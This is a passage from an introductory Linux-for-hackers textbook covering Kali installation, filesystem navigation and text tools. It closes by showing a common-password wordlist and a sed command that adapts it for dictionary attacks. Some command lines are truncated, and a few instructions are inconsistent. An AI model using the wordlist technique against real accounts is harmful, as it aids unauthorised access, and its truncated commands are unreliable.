Once the installation is complete, you will be prompted as to whether you
want to use a network mirror. This really is not necessary, so click No.
Then Kali will prompt you as to whether you want to install Grand Unified
Bootloader (GRUB), shown in Figure 10. A bootloader enables you to
select different operating systems to boot into, which means when you boot
your VM, you can boot into either Kali or another operating system. Select
Yes and click Continue.

Figure 10: Installing GRUB
On the next screen, you will be asked whether you want to install the
GRUB bootloader automatically or manually. For reasons as yet unclear, if
you choose the second option, Kali will tend to hang and display a blank
screen after installation. Select Enter device manually.
On the following screen, select the drive where the GRUB bootloader
should be installed (it will likely be something like /dev/sda). Click through

to the next screen, which should tell you that the installation is complete.
Congratulations! You’ve installed Kali. Click Continue. Kali will attempt
to reboot, and you will see a number of lines of code go across a blank
black screen before you are eventually greeted with Kali’s login screen, as
shown in Figure 11.
Figure 11: The Kali login screen
Log in as kali using the password kali, or whichever password you have
selected. You should be greeted with the Kali desktop, as in Figure 12.

Figure 12: The Kali home screen
You are now ready to begin your journey into the exciting field of hacking!
Welcome!
Installing Kali Through the Windows Subsystem
for Linux
For those looking for a less intrusive method of running Linux, Microsoft
offers the Windows Subsystem for Linux (WSL). Using it, you can learn the
Linux operating system without the hassle of installing a VM. The
drawback is that many networking (and, therefore, hacking) capabilities are
not enabled. This means that you can learn Linux but not study hacking
with this subsystem. That said, here’s how to install this WSL on your
Windows operating system.

The first step is to enable WSL. Open PowerShell by running powershell at
the command prompt or entering PowerShell in your application menu.
Then enter the following at the PowerShell prompt:
PS>Enable_windowsOptionalFeature -Online –FeatureName Micr
Do you want to restart the computer to complete t
[Y] Yes  [N] No  [?] Help (default is Y):
As you can see, PowerShell will then ask you whether you want to restart
your system to enable WSL. Press ENTER.
Now that you have enabled this feature and restarted your system, you need
to install Kali. Go to the Windows Application store
(https://apps.microsoft.com/store/apps). There, you should see icons for
many major Linux distributions. Click Kali Linux, then select Get.
Kali will begin to download. This is a stripped-down, essentials-only
version of Kali, so the download should be quick. Once it’s complete, you
will be prompted for a username and password.
The minimal version you just installed has little to no tools (depending on
your definition of the word tool). So, you need to download all Kali tools.
Enter the following command to update, upgrade, and install them from the
Kali repository:

$ sudo apt update && sudo apt upgrade -y && sudo apt insta
You will need to enter your username and password to proceed. This
installation can take quite a while, so take a break and get your favorite
beverage.
Note that this version of Linux differs from the one you’d install through
VirtualBox in a few ways. First, the Linux system shares the same IP
address and MAC address as the Windows system. This is notably different
from the VirtualBox version, where the interfaces have separate IP and
MAC addresses. (To see this information, run sudo ipconfig in Linux and
ipconfig in the Windows command prompt and compare the output.)
Another difference is that, unfortunately, several functions on this
virtualized Linux are not enabled by default. One of these is ping, the Linux
utility for testing whether a host is up. When we try to ping another system
on our local network or https://www.google.com, both return this cryptic
message:
ping:socket: Operation not permitted
To enable ping on our newly install Kali system, enter the following
command:

$ sudo setcapcap_net_raw+p /bin/ping
After you do so, you should now be able to ping https://www.google.com.
You are now ready to use Kali within Windows! For the seasoned Linux
user, WSL makes it easy to test your tools and scripts. However, I still
recommend a native install for professional penetration testing.
OceanofPDF.com

1
GETTING STARTED WITH THE
BASICS

By our very nature, hackers are doers. We want to touch and play with
things. We also want to create and (sometimes) break things. Few of us
want to read long tomes of information technology theory before we can do
what we love most: hacking. With that in mind, this chapter is designed to
give you some fundamental skills to get you up and running in Kali . . .
now!
In this chapter, we won’t go into any one concept in great detail—we’ll
cover just enough to let you play and explore in the operating system of
hackers: Linux. We will save more in-depth discussions for later chapters.
Introductory Terms and Concepts
Before we begin our journey through the wonderful world of Linux Basics
for Hackers, I want to introduce a few terms that should clarify some
concepts discussed later in this chapter.
Binaries This term refers to files that can be executed, similar to
executables in Windows. Binaries generally reside in the /usr/bin or
usr/sbin directory and include utilities such as ps, cat, ls, and ifconfig
(we’ll touch on all four of these in this chapter), as well as applications
such as the wireless hacking tool aircrack-ng and the intrusion detection
system Snort.
Case sensitivity Unlike Windows, the Linux filesystem is case
sensitive. This means that Desktop is different from desktop, which is

different from DeskTop. Each of these would represent a different file or
directory name. Many people coming from a Windows environment can
find this frustrating. If you get the error message “File or directory not
found” and you are sure the file or directory exists, you probably need to
check your case.
Directory This is the same as a folder in Windows. A directory
provides a way of organizing files, usually in a hierarchical manner.
Home Each user has their own /home directory, and this is generally
where files you create will be saved by default.
Kali Kali Linux is a distribution of Linux specifically designed for
penetration testing. It has hundreds of tools preinstalled, saving you the
hours it would take to download and install them yourself.
root Like nearly every operating system, Linux has an administrator
(or superuser) account, designed for use by a trusted person who can do
nearly anything on the system. This would include such things as
reconfiguring the system, adding users, and changing passwords. In
Linux, that account is called root. As a hacker or pentester, you will
often use the root account to give yourself control over the system. In
fact, many hacker tools require that you use the root account.
Script This is a series of commands run in an interpretive environment
that converts each line to source code. Many hacking tools are simply
scripts. Scripts can be run with the bash interpreter or any of the other
scripting language interpreters, such as Python, Perl, or Ruby. Python is
currently the most popular interpreter among hackers.

Shell This is an environment and interpreter for running commands in
Linux. The most widely used shell is bash, which stands for Bourne-
again shell, but other popular shells include the C shell and Z shell. I
will be using the bash shell exclusively in this book.
Terminal This is a command line interface (CLI).
With those basics behind us, we will attempt to methodically develop the
essential Linux skills you’ll need to become a hacker or penetration tester.
In this first chapter, I’ll walk you through getting started with Kali Linux.
A Tour of Kali
Once you start Kali, you’ll be greeted with a login screen. Log in using the
Kali account username kali and the default password kali (if you changed
the password earlier, use your new password here). You should now have
access to your Kali desktop. We’ll quickly look at two of the most basic
aspects of the desktop: the terminal interface and file structure.
The Terminal
The first step to using Kali is to open the terminal, which is the command
line interface we’ll use in this book. You’ll find the icon for the terminal
along the left of the desktop. Click this icon to open the terminal. Your new
terminal should look like the one shown in Figure 1-1.

Figure 1-1: The Kali terminal
This terminal opens the command line environment, known as the shell,
which enables you to run commands on the underlying operating systems
and write scripts. Although Linux has many different shell environments,
the most popular is the bash shell, which is the default shell in many Linux
distributions.
To change your password, you can use the command passwd.
The Linux Filesystem
The Linux filesystem structure is somewhat different from that of Windows.
Linux doesn’t have a physical drive (such as the C: drive) at the base of the
filesystem but uses a logical filesystem instead. At the very top of the
filesystem structure is /, often referred to as the root of the filesystem, as if

it were an upside-down tree (see Figure 1-2). Keep in mind that this is
different from the root user. These terms may seem confusing at first, but
they will become easier to differentiate once you get used to Linux.
Figure 1-2: The Linux filesystem
The root (/) of the filesystem is at the top of the tree, and the following are
the most important subdirectories to know:
/root The home directory of the all-powerful root user
/etc Generally contains the Linux configuration files—files that control
when and how programs start up
/home The user’s home directory
/mnt Where other filesystems are attached or mounted to the filesystem
/media Where CDs and USB devices are usually attached or mounted
to the filesystem
/bin Where application binaries (the equivalent of executables in
Microsoft Windows or applications in macOS) reside

/lib Where you’ll find libraries (shared programs that are similar to
Windows DLLs)
We’ll spend more time with these key directories throughout this book.
Understanding these first-level directories is important to navigating
through the filesystem from the command line.
It’s also important to know before you start that you should not log in as
root when performing routine tasks, because anyone who hacks your system
(yes, hackers sometimes get hacked) when you’re logged in as root would
immediately gain root privileges and thus “own” your system. Log in as a
regular user when starting regular applications, browsing the web, running
tools like Wireshark, and so on. For the practice you’ll do in this book,
staying logged in as root should be fine.
Basic Commands in Linux
To begin, let’s look at some basic commands that will help you get up and
running in Linux.
Finding Yourself with pwd
Unlike when you’re working in a graphical user interface (GUI)
environment like Windows or macOS, the command line in Linux does not
always make it apparent which directory you’re presently in. To navigate to
a new directory, you usually need to know where you are currently. The

print working directory command, pwd, returns your location within the
directory structure.
Enter pwd in your terminal to see where you are:
kali> pwd
/home/kali
In this case, Linux returned /home/kali, telling me I’m in the kali user’s
directory. And because you logged in as kali when you started Linux, you
should be in the kali user’s directory, too, which is two levels below the top
of the filesystem structure (/).
If you’re in another directory, pwd will return that directory name instead.
Checking Your Login with whoami
In Linux, the one “all-powerful” superuser or system administrator is
named root, and it has all the system privileges needed to add users, change
passwords, change privileges, and so on. Obviously, you don’t want just
anyone to have the ability to make such changes; you want someone who
can be trusted and has proper knowledge of the operating system. As a
hacker, you usually need to have all those privileges to run the programs
and commands you need (many hacker tools won’t work unless you have
root privileges), so you’ll want to log in as root.

If you’ve forgotten whether you’re logged in as root or another user, you
can use the whoami command to see which user you’re logged in as:
kali> whoami
kali
If I had been logged in as another user, such as my personal account, whoami
would have returned my username instead, as shown here:
kali> whoami
OTW
It’s also important to know that you should not log in as root when
performing routine tasks, because anyone who hacks your system (yes,
hackers sometimes get hacked) would immediately gain those root
privileges. Log in as a regular user when starting regular applications,
browsing the web, running tools like Wireshark, and so on.
Navigating the Linux Filesystem
Navigating the filesystem from the terminal is an essential Linux skill. To
get anything done, you need to be able to move around to find applications,
files, and directories located in other directories. In a GUI-based system,
you can visually see the directories, but when you’re using the command

line interface, the structure is entirely text based, and navigating the file-
system means using some commands.
Changing Directories with cd
To change directories from the terminal, use the change directory
command, cd. For example, here’s how to change to the /etc directory used
to store configuration files:
kali> cd /etc
kali:/etc>
The prompt changes to kali:/etc, indicating that we’re in the /etc directory.
We can confirm this by entering pwd:
kali:/etc> pwd
/etc
To move up one level in the file structure (toward the root of the file
structure, or /), we use cd followed by double dots (..), as shown here:
kali:/etc> cd ..
kali> pwd
/

This moves us up one level from /etc to the root (/) directory, but you can
move up as many levels as you need. Just use the same number of double-
dot pairs as the number of levels you want to move:
You would use .. to move up one level.
You would use ../.. to move up two levels.
You would use ../../.. to move up three levels, and so on.
So, for example, to move up two levels, enter cd followed by two sets of
double dots with a forward slash in between:
kali> cd ../..
You can also move up to the root level in the file structure from anywhere
by entering cd /, where / represents the root of the filesystem.
Listing the Contents of a Directory with ls
To see the contents of a directory (the files and subdirectories), we can use
the ls (list) command. This is very similar to the dir command in Windows.
kali> ls
Debian          Music           usr
Desktop         Picture         Videos

Documents       Public
Downloads       Templates
This command lists both the files and directories contained in the directory.
You can also use this command on any particular directory, not just the one
you are currently in, by listing the directory name after the command; for
example, ls /etc shows what’s in the /etc directory.
To get more information about the files and directories, such as their
permissions, owner, size, and when they were last modified, you can add
the -l switch after ls. (The l stands for long.) This is often referred to as
long listing. Let’s try it here:
kali> ls -l
total 32
drw-r--r-- 1  kali kali 4096 Dec 5 11:15 Debian
drw-r--r-- 2  kali kali 4096 Dec 5 11:15 Desktop
drw-r--r-- 3  kali kali 4096 Dec 9 13:10 Document
drw-r--r-- 18 kali kali 4096 Dec 9 13:43 Download
--snip--
drw-r--r-- 1  kali kali 4096 Dec 5 11:15 Videos
As you can see, ls -l provides us with significantly more information, such
as whether an object is a file or directory, the number of links, the owner,

the group, its size, when it was created or modified, and its name.
I typically add the -l switch whenever doing a listing in Linux, but to each
their own. We’ll talk more about ls -l in Chapter 5.
Some files in Linux are hidden and won’t be revealed by a simple ls or ls -l
command. To show hidden files, add a lowercase –a switch, like so:
kali> ls -la
If you aren’t seeing a file you expect to see, it’s worth trying ls with the a
flag. When using multiple flags, you can combine them into one, as we’ve
done here with -la instead of -l -a.
Getting Help
Nearly every command, application, or utility has a dedicated help file in
Linux that provides guidance for its use. For instance, if I needed help using
the best wireless cracking tool, aircrack-ng, I could simply type the aircrack-
ng command followed by the --help command:
kali> aircrack-ng --help
Note the double dash here. The convention in Linux is to use a double dash
(--) before word options, such as help, and a single dash (-) before single-

letter options, such as –h.
When you enter this command, you should see a short description of the
tool and guidance on how to use it. In some cases, you can use either -h or
-? to get to the help file. For instance, if I needed help using the hacker’s
best port-scanning tool, nmap, I would enter the following:
kali> nmap -h
Unfortunately, although many applications support all three options (--help,
-h, and -?), there’s no guarantee the application you’re using will. So, if one
option doesn’t work, try another.
Referencing Manual Pages with man
In addition to the help switch, most commands and applications have a
manual (man) page with more information, such as a description and
synopsis of the command or application. You can view a man page by
simply typing man before the command, utility, or application. To see the
man page for aircrack-ng, for example, you would enter the following:
kali> man aircrack-ng
NAME
        aircrack-ng - a 802.11 WEP / WPA-PSK key 
SYNOPSIS

aircrack-ng [options] <.cap / .ivs file(s
DESCRIPTION
        aircrack-ng is an 802.11 WEP and WPA/WPA2
        It can recover the WEP key once enough en
        captured with airodump-ng. This part of t
        mines the WEP key using two fundamental m
        via the PTW approach (Pyshkin, Tews, Wein
        of the PTW approach is that very few data
        crack the WEP key. The second method is t
        FMS/KoreK method incorporates various sta
        cover the WEP key and uses these in combi
        Additionally, the program offers a dictio
        the WEP key. For cracking WPA/WPA2 pre-sh
        or stdin) or an airolib-ng has to be used
This opens the manual for aircrack-ng, providing you with more detailed
information than the help screen. You can scroll through this manual file
using the ENTER key, or you can page up and down using the PAGE DOWN and
PAGE UP keys, respectively; you can also use the arrow keys. To exit, simply
enter q (for quit), and you’ll return to the command prompt.
Finding Stuff
Until you become familiar with Linux, it can be frustrating to find your way
around, but knowledge of a few basic commands and techniques will go a

long way toward making the command line much friendlier. The following
commands help you locate things from the terminal.
Searching with locate
Probably the easiest command to use is locate. Followed by a keyword
denoting what it is you want to find, this command will go through your
entire filesystem and locate every occurrence of that word.
To look for aircrack-ng, for example, enter the following:
kali> locate aircrack-ng
/usr/bin/aircrack-ng
/usr/share/applications/kali-aircrack-ng.desktop
/usr/share/desktop-directories/05-1-01-aircrack-n
--snip--
/var/lib/dpkg/info/aircrack-ng.md5sums
The locate command is not perfect, however. Sometimes the results of locate
can be overwhelming, giving you too much information. Also, locate uses a
database that is usually updated only once a day, so if you just created a file
a few minutes or a few hours ago, it might not appear in this list until the
next day. It’s worth knowing the disadvantages of these basic commands so
you can better decide when best to use each one.

To update the database that the locate command uses, enter the following:
kali> sudo updatedb
Note that we preceded the updatedb command with sudo. This is important. If
a command requires root (superuser) privileges, as updatedb does, and you’re
logged in as a regular user, you can provide the command with root
privileges using the sudo command, followed by your password.
Finding Binaries with whereis
If you’re looking for a binary file, you can use the whereis command to
locate it. This command returns not only the location of the binary but also
its source and man page if they are available. Here’s an example:
kali> whereis aircrack-ng
aircrack-ng: /usr/bin/aircrack-ng /usr/share/man/
In this case, whereis returned just the aircrack-ng binaries and man page,
rather than every occurrence of the word aircrack-ng. Much more efficient
and illuminating, don’t you think?
Finding Binaries in the PATH Variable with which

The which command is even more specific: it returns the location of only the
binaries in the PATH variable in Linux. We’ll look more closely at the PATH
variable in Chapter 7, but for now, it’s sufficient to know that PATH holds the
directories in which the operating system looks for the commands you
execute at the command line. For example, when I enter aircrack-ng on the
command line, the operating system looks to the PATH variable to see in
which directories it should search for aircrack-ng:
kali> which aircrack-ng
/usr/bin/aircrack-ng
Here, which was able to find a single binary file in the directories listed in the
PATH variable. At minimum, these directories usually include /usr/bin, but
they may also include /usr/sbin and maybe a few others.
Performing More Powerful Searches with find
The find command is the most flexible of the searching utilities. It is
capable of beginning in any designated directory and looking for a number
of different parameters, including, of course, the filename, but also the date
of creation or modification, the owner, the group, permissions, and the size.
Here’s the basic syntax for find:

find directory options expression
So, if I wanted to search for a file with the name apache2 (an open source
web server) starting in the root directory, I would enter the following:
kali> find / -type f -name apache2
First, I state the directory in which to start the search, in this case /. Then I
specify which type of file to search for, in this case f for an ordinary file.
Finally, I give the name of the file I’m searching for, in this case apache2.
Here are my results for this search:
kali> find / -type f -name apache2
/usr/lib/apache2/mpm-itk/apache2
/usr/lib/apache2/mpm-event/apache2
/usr/lib/apache2/mpm-worker/apache2
/usr/lib/apache2/mpm-prefork/apache2
/etc/cron.daily/apache2
/etc/logrotate.d/apache2
/etc/init.d/apache2
/etc/default/apache2
The find command started at the top of the filesystem (/), went through
every directory looking for apache2 in the filename, and then listed all

instances found.
As you might imagine, a search that looks in every directory can be slow.
One way to speed it up is to look only in the directory where you would
expect to find the files you need. For example, if we were looking for a
configuration file, we could start the search in the /etc directory, and Linux
would search only as far as its subdirectories. Let’s try it:
kali> find /etc -type f -name apache2
/etc/init.d/apache2
/etc/logrotate.d/apache2
/etc/cron.daily/apache2
/etc/default/apache2
This much faster search found occurrences of apache2 only in the /etc
directory and its subdirectories.
It’s also important to note that unlike some other search commands, find
displays only exact name matches. If the file apache2 has an extension,
such as apache2.conf, the search will not find a match. We can remedy this
limitation by using wildcards, which enable us to match multiple characters.
Wildcards come in a few different forms: * . , ? and [].
Let’s look in the /etc directory for all files that begin with apache2 and have
any extension. For this, we could write a find command using the following

wildcard:
kali> sudo find /etc -type f -name apache2.*
/etc/apache2/apache2.conf
When we run this command, we find that there is one file in the /etc
directory that fits the apache2.* pattern. When we use a period followed by
the * wildcard, the terminal looks for any extension after the filename
apache2. This can be a very useful technique for finding files when you
don’t know the file extension.
When I run this command, I find two files that start with apache2 in the /etc
directory, including the apache2.conf file.
A QUICK LOOK AT WILDCARDS
Let’s say we’re doing a search on a directory that has the files cat, hat,
what, and bat. The ? wildcard is used to represent a single character, so a
search for ?at would find hat, cat, and bat but not what, because at in this
filename is preceded by two letters. The [] wildcard is used to match the
characters that appear inside the square brackets. For example, a search for
[c,b]at would match cat and bat but not hat or what. Among the most
widely used wildcards is the asterisk (*), which matches any character(s) of

any length, from none to an unlimited amount of characters. A search for
*at, for example, would find cat, hat, what, and bat.
Filtering with grep
Very often when using the command line, you’ll want to search for a
particular keyword. For this, you can use the grep command as a filter to
search for keywords.
The grep command is often used when output is piped from one command to
another. I cover piping in Chapter 2, but for now, suffice it to say that Linux
(and Windows, for that matter) allows us to take the output of one
command and send it as input to another command. This is called piping,
and we use the | command to do it. (The | key is usually above the ENTER
key on keyboards.)
The ps command is used to display information about processes running on
the machine. We cover this in more detail in Chapter 6, but for this
example, suppose I want to see all the processes running on my Linux
system. In this case, I can use the ps (processes) command followed by the
aux switches to specify which process information to display, like so:
kali> ps aux

This provides me with a listing of all the processes running in this system—
but what if I want to find just one process to see if it is running?
I can do this by piping the output from ps to grep and searching for a
keyword. For instance, to find out whether the apache2 service is running, I
would enter the following:
kali> ps aux | grep apache2
kali  4851 0.2 0.7 37548  7668 ?  Ss  10:14  0:00
kali  4906 0.0 0.4 37572  4228 ?  S   10:14  0:00
kali  4910 0.0 0.4 37572  4228 ?  Ss  10:14  0:00
--snip--
This command tells Linux to display all my services and then send that
output to grep, which will look through the output for the keyword apache2
and then display only the relevant output, thus saving me considerable time
(and my eyesight).
Modifying Files and Directories
Once you’ve found your files and directories, you’ll want to be able to
perform actions on them. In this section, we look at how to create files and
directories, copy files, rename files, and delete files and directories.
Creating Files

There are many ways to create files in Linux, but for now we’ll just look at
two simple methods. The first is cat, which is short for concatenate,
meaning to combine pieces together (not a reference to your favorite
domesticated feline). The cat command is generally used for displaying the
contents of a file, but it can also be used to create small files. For creating
bigger files, it’s better to enter the code in a text editor such as vim, emacs,
mousepad, gedit, or kate and then save it as a file.
Concatenation with cat
The cat command followed by a filename will display the contents of that
file, but to create a file, we follow the cat command with a redirect, denoted
with the > symbol, and a name for the file we want to create. Here’s an
example:
kali> cat > hackingskills
Hacking is the most valuable skill set of the 21st century
When you press ENTER, Linux will go into interactive mode and wait for
you to start entering content for the file. This can be puzzling, because the
prompt disappears, but if you simply begin typing, whatever you enter will
go into the file (in this case, hackingskills). Here, I entered Hacking is the
most valuable skill set of the 21st century! To exit and return to the prompt, I

press CTRL-D. Then, when I want to see what’s in the file hackingskills, I
enter the following:
kali> cat hackingskills
Hacking is the most valuable skill set of the 21s
If you don’t use the redirect symbol, Linux will spit back the contents of
your file.
To add, or append, more content to a file, you can use the cat command
with a double redirect (>>), followed by whatever you want to add to the end
of the file. Here’s an example:
kali> cat >> hackingskills
Everyone should learn hacking
Linux once again goes into interactive mode, waiting for content to append
to the file. When I enter Everyone should learn hacking and press CTRL-D, I am
returned to the prompt. Now, when I display the contents of that file with
cat, I can see that the file has been appended with Everyone should learn
hacking, as shown here:
kali> cat hackingskills
Hacking is the most valuable skill set of the 21s

Everyone should learn hacking
If I want to overwrite the file with new information, I can simply use the cat
command with a single redirect again, as follows:
kali> cat > hackingskills
Everyone in IT security without hacking skills is in the d
kali> cat hackingskills
Everyone in IT security without hacking skills is
As you can see here, Linux goes into interactive mode, and I enter the new
text and then exit back to the prompt. When I once again use cat to see the
contents of the file, I see that my previous words have been overwritten
with the latest text.
File Creation with touch
The second command for file creation is touch. This command was
originally developed so a user could simply touch a file to change some of
its details, such as the date it was created or modified. However, if the file
doesn’t already exist, this command creates that file by default.
Let’s create newfile with touch:

kali> touch newfile
Now when I then use ls –l to see the long list of the directory, I see that a
new file has been created named newfile. Note that its size is 0 because
there is no content in newfile.
Creating a Directory
The command for creating a directory in Linux is mkdir, a contraction of
make directory. To create a directory named newdirectory, enter the
following command:
kali> mkdir newdirectory
To navigate to this newly created directory, simply enter this:
kali> cd newdirectory
Copying a File
To copy files, we use the cp command. This creates a duplicate of the file in
the new location and leaves the old one in place.

Here, we’ll create the file oldfile in the /home/kali directory with touch and
copy it to /home/kali/newdirectory/, renaming it in the process and leaving
the original oldfile in place:
kali> touch oldfile
kali> cp oldfile /home/kali/newdirectory/newfile
Renaming the file is optional and is done simply by adding the name you
want to give it to the end of the directory path. If you don’t rename the file
when you copy it, the file will retain the original name by default.
When we then navigate to newdirectory, we see that there is an exact copy
of oldfile called newfile:
kali> cd newdirectory
kali> ls
newfile
Renaming a File
Unfortunately, Linux doesn’t have a command intended solely for renaming
a file, as Windows and some other operating systems do, but it does have
the mv (move) command.

The mv command can be used to move a file or directory to a new location,
or simply to give an existing file a new name. To rename newfile to
newfile2, you would enter the following:
kali> mv newfile newfile2
kali> ls
oldfile newfile2
Now, when you list (ls) that directory, you should see newfile2 but not
newfile, because it has been renamed. You can do the same with directories.
Removing a File
To remove a file, you can simply use the rm command, like so:
kali> rm newfile2
If you now do a long listing on the directory, you can confirm that the file
has been removed.
Removing a Directory
The command for removing a directory is similar to the rm command for
removing files but with dir (for directory) appended, like so:

kali> rmdir newdirectory
rmdir:failed to remove 'newdirectory': Directory 
It’s important to note that rmdir won’t remove a directory that is not empty.
Instead, it will give you a warning message that the directory is not empty,
as you can see in this example. You must first remove all the contents of the
directory before removing it. This is to stop you from accidentally deleting
objects you didn’t intend to delete.
If you do want to remove a directory and its content all in one go, you can
use the -r switch after rm, like so:
kali> rm -r newdirectory
Just a word of caution, though: be wary of using the -r option with rm, at
least at first, because it’s very easy to remove valuable files and directories
by mistake. Using rm -r in your home directory, for instance, would delete
every file and directory there—probably not what you were intending.
Go Play Now!
Now that you have some basic skills for navigating around the filesystem,
you can play with your Linux system a bit before progressing. The best way
to become comfortable with using the terminal is to try out your newfound

skills right now. In subsequent chapters, we will explore further and deeper
into our hacker playground.
Exercises
1. Use the ls command from the root (/) directory to explore the directory
structure of Linux. Move to each of the directories with the cd command
and run pwd to verify where you are in the directory structure.
2. Use the whoami command to verify which user you are logged in as.
3. Use the locate command to find word lists that can be used for password
cracking.
4. Use the cat command to create a new file and then append to that file.
Keep in mind that > redirects input to a file and >> appends to a file.
5. Create a new directory called hackerdirectory and create a new file in
that directory named hackedfile. Now copy that file to your /home/kali
directory and rename it secretfile.
OceanofPDF.com

2
TEXT MANIPULATION

In Linux, nearly everything you deal with directly is a file, and most often
these will be text files; for instance, all configuration files in Linux are text
files. So, to reconfigure an application, you simply open the configuration
file, change the text, save the file, and then restart the application—your
reconfiguration is complete.
With so many text files, manipulating text becomes crucial in managing
Linux and Linux applications. In this chapter, you’ll use several commands
and techniques for manipulating text in Linux.
For illustrative purposes, I’ll use files from the world’s most widely used
web server, apache2. The free and open source apache2 web server is used
by some of the busiest websites in the world, such as spotify.com,
dropbox.com, netflix.com, tencent.com, bbc.com, and many others. It’s
installed by default on our Kali system (we’ll be doing more with the
apache2 web server in Chapter 12).
Viewing Files
As demonstrated in Chapter 1, the most basic text display command is
probably cat, but it has its limitations. Use cat to display the apache2 config
file (apache2.conf) found in /etc/apache2:
kali> cat /etc/apache2/apache2.conf

Your screen should now display the entire apache2.conf file, which will
stream until it comes to the end of the file, as shown here, which isn’t the
most convenient or practical way to view and work with this file:
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpk
# seeREADME.Debianfor details.
# Include generic snippets of statements:
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 srnoet
In the following two sections, I will show you the head and tail commands,
which are two methods for displaying just part of a file’s content in order to
more easily view the key content.
Finding the Head
If you just want to view the beginning of a file, you can use the head
command. By default, this command displays the first 10 lines of a file. The

following command, for instance, shows you the first 10 lines of
apache2.conf:
kali> head /etc/apache2/apache2.conf
#------------------------------------------------
# This is the main Apache server configuration fi
# configuration directives that give the server i
# See http://httpd.apache.org/docs/2.4/ for detai
# the directives and /usr/share/doc/apache2/READM
# hints.
#
#
# Summary of how the Apache 2 configuration works
# The Apache 2 web server configuration in Debian
# upstream's suggested way to configure the web s
If you want to see more or fewer than the default 10 lines, enter a quantity
using the dash (-) switch after the call to head and before the filename. For
example, if you want to see the first 20 lines of the file, you would enter the
following command:
kali> head -20 /etc/apache2/apache2.conf
#------------------------------------------------
# This is the main Apache server configuration fi
# configuration directives that give the server i
# See http://httpd.apache.org/docs/2.4/ for detai

# the directives and /usr/share/doc/apache2/READM
# hints.
#
#
# Summary of how the Apache 2 configuration works
# The Apache 2 web server configuration in Debian
# upstream's suggested way to configure the web s
# default Apache2 installation attempts to make a
# virtual hosts, and extra configuration directiv
# order to make automating the changes and admini
# possible.
# It is split into several files forming the conf
# below, all located in the /etc/apache2/ directo
#
#       /etc/apache2/
#       |-- apache2.conf
You should see only the first 20 lines of apache2.conf displayed in your
terminal window.
Finding the Tail
The tail command is similar to the head command, but it’s used to view the
last lines of a file. Let’s use it on apache2.conf:

kali> tail /etc/apache2/apache2.conf
# Include of directories ignores editors' and dpk
# seeREADME.Debian for details.
# Include generic snippets of statements:
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 srnoet
Notice that this command displays some of the last include lines of the file,
but not all of them, because like head, the default for tail is to show 10 lines.
You can display more lines by grabbing the last 20 lines of apache2.conf.
As with the head command, you can tell tail how many lines to display by
entering a dash (-) and then the number of lines between the command and
the filename:
kali> tail -20 /etc/apache2/apache2.conf
# Note that the use of %{X-Forwarded-For}i instea
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Re
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}

LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpk
# seeREADME.Debian for details.
# Include generic snippets of statements:
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 srnoet
Now we can view nearly all the include lines on one screen.
Numbering the Lines
Sometimes, especially with very long files, we may want the file to display
line numbers. Since apache2.conf has more than 190 lines, line numbers
would be useful here. This makes it easier to reference changes and come
back to the same place within the file.
To display a file with line numbers, we use the nl (number lines) command.
Simply enter the following command:

kali> nl /etc/apache2/apache2.conf
181  LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \
182  LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Ref
183  LogFormat "%h %l %u %t \"%r\" %>s %O" common
184  LogFormat "%{Referer}i -> %U" referer
185  LogFormat "%{User-agent}i" agent
186  # Include of directories ignores editors' an
187  # see README.Debian for details.
188  # Include generic snippets of statements:
189  IncludeOptional conf-enabled/*.conf
190  # Include the virtual host configurations:
191  IncludeOptional sites-enabled/*.conf
192  # vim: syntax=apache ts=4 sw=4 sts=4 srnoet
Each line now has a number, making referencing much easier. Note that this
command skips the numbering for the blank lines.
Filtering Text with grep
The command grep is probably the most widely used text manipulation
command. It lets you filter the content of a file for display. If, for instance,
you want to see all lines that include the word mod (short for module) in

your apache2.conf file, you could use cat with the help of grep and ask it to
display only those lines:
kali> cat /etc/apache2/apache2.conf | grep mod
# default Apache2 installation attempts to make a
#       |-- mods-enabled
# * Configuration files in the mods-enabled/, con
#   directories contain particular configuration 
#   helpers a2enmod/a2dismod, a2ensite/a2dissite 
# at <URL:http://httpd.apache.org/docs/2.4/mod/co
# It is also possible to configure the log level 
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Sets the default security model of the Apache2 
# Use mod_remoteip instead.
This command first views apache2.conf and then uses a pipe (|) to send it
to grep, which takes the file as input, looks for lines with occurrences of the
word mod, and displays only those lines. The grep command is a very
powerful and essential command for working in Linux, because it can save
you hours of searching for every occurrence of a word or command in a
file.
Using sed to Find and Replace

The sed command lets you search for occurrences of a word or a text pattern
and then perform some action on it. The name of the command is a
contraction of stream editor. In its most basic form, sed operates like the
Find and Replace function in Windows.
Let’s begin by opening a password list in Kali with head. You can find such a
file at /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt.
kali> head /usr/share/metasploit-framework/data/wordlists
admin
123456
12345
123456789
password
iloveyou
princess
1234567
12345678
abc123
This file contains common passwords used in Unix and Linux (which are
very similar operating systems). This particular file is used by the most
popular hacking framework, Metasploit. (For more information on
Metasploit, see my book Metasploit Basics for Hackers.)

You have probably been told in your information security classes that you
should never use a dictionary word as a password, as it is easy to crack with
a dictionary attack, in which a hacker attempts to log in using words taken
from a list (see my book Getting Started Becoming a Master Hacker for
more on dictionary attacks). Often, people take a simple dictionary word or
phrase such as iloveyou and replace the letters with numbers to create a
stronger password, such as il0vey0u, where the letter o is replaced with the
number zero. This practice is referred to as munging and can help defeat
dictionary attacks.
As a hacker, we might want to try to overcome this munging by replacing
all instances of the letter o with the number zero in the password list we’ll
use to attack a system. After changing to root, we can do this with the sed
command in Linux:
root@kali> sed s/o/0/g /usr/share/metasploit-
framework/data/wordlists/unix_passwords.txt > /usr/share/m
framework/data/wordlists/unix_passwords2.txt
The s command performs the substitution: you first give the term you are
